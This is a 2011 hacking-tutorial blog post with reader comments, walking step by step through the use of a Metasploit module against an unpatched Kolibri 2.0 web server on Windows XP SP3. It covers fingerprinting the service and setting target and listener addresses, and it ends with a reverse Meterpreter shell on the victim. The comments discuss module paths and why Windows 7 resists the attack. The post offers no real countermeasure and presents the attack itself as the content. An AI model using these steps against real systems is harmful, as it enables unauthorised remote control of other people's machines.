Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)
Type : Tutorial
Level : Easy
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Tested Vulnerable Application : Kolibri 2.0
Exploit Credit : mr_me, The_Leader
Another zeroday exploit found in Kolibri HTTP Web Server. Actually this exploit was written into metasploit framework module in 2011-08-03, but until now there's no fixation or update from the Kolibri developer.
Requirements :
1. Metasploit Framework
2. Kolibri HTTP Server 2.0(download below)
3. Kolibri HTTP exploit(download link)
Step By Step :
Attacker IP address : 192.168.8.93
Victim IP address : 192.168.8.94
1. Download the kolibri_http.rb exploit from the link above and for testing purpose I've also included the link to download the vulnerable Kolibri web server 2.0 so you can try in your own lab.
Copy the kolibri_http.rb to following folder(I'm using backtrack 5 R1) :
/pentest/exploit/framework/modules/exploit/windows/http
2. To determine which type of server running, we can do a simple fingerprint by telneting to the remote host and specified port. In this case the victim kolibri HTTP server was run on port 8080, but the usual web server was run on port 80.
telnet 192.168.8.94 8080
^ ^
remote ip address port
3. The next step let's prepare the exploit to exploiting the vulnerable kolibri web server by choosing the exploit we've already added in step 1. In this exploit I'm using meterpreter payload.
4. Set up the needed switch to perform our exploit. To view all the available switch for this exploit + payload just run show options command.
Information :
set rhost 192.168.8.94 --> determine the target ip address set rport 8080 --> determine the target port which run kolibri web server set lhost 192.168.8.93 --> our local ip address to receive reverse connection from victim set lport 443 --> local port to handle reverse connection from victim
5. When everything we've been set up correctly, now let's try to run the exploit by using exploit command and see it's successful or not.
pWn3D!!
Countermeasures :
1. Until now I'm wrote this tutorial 2011-10-21 Kolibri web server still no update a.k.a the exploit status still zeroday
Hope it's useful 
Incoming search terms:
- server : vishnu
- hacking a windows web server
- how to hack a server on windows xp
- kalilinux msf4 exploits
- kolibri hack
- kolibri v2 0 http server download
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
9 Responsesto “Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)”
Leave a Reply
Links
Get Updates via Networkedblogs
Vishnu,
Instead of copying your exploit into:
/pentest/exploit/framework/modules/exploit/windows/http
You should copy it into:
~/.msf4/modules/exploits/windows/http
#Matt
Hmm…but that’s what I’m doing…usually the .msf4 folder was for fileformat exploit generated file.
hi bro i tested it on windows 7 but wont work server i run on windows 7 and found not working ?should i use xp box and only xp service pack 3 will be or any xp box i can try plz reply soon
#jeetjain
I haven’t try it in Windows 7, if you have try it, maybe it won’t work..
It does not work in Windows 7. It only will work in xp sp3 or windows 2003 sp2, per http://www.metasploit.com/modules/exploit/windows/http/kolibri_http
Windows 7 has DEP and ASLR which helps prevent exploitation. There's more work to be done on the metasploit module to get it past those, if it's possible.
#Matt
Thanks for explanation
Thanks Matt Andreko bro
Hi,
As author of Kolibri WebServer let me clarify that Kolibri WS is not intended for any production use or any use on publicly available address. It is only development server for easy testing of PHP/web applications locally, it does not scale, it is not secure as it is not intended to be secure or scalable.
#Fedja S
Sure I’LL deliver your message..but btw, even it was not for publicly any production, but how if I run your webserver for development/easy testing on a Local Area Network inside my campuss that has more than thousand of users inside it?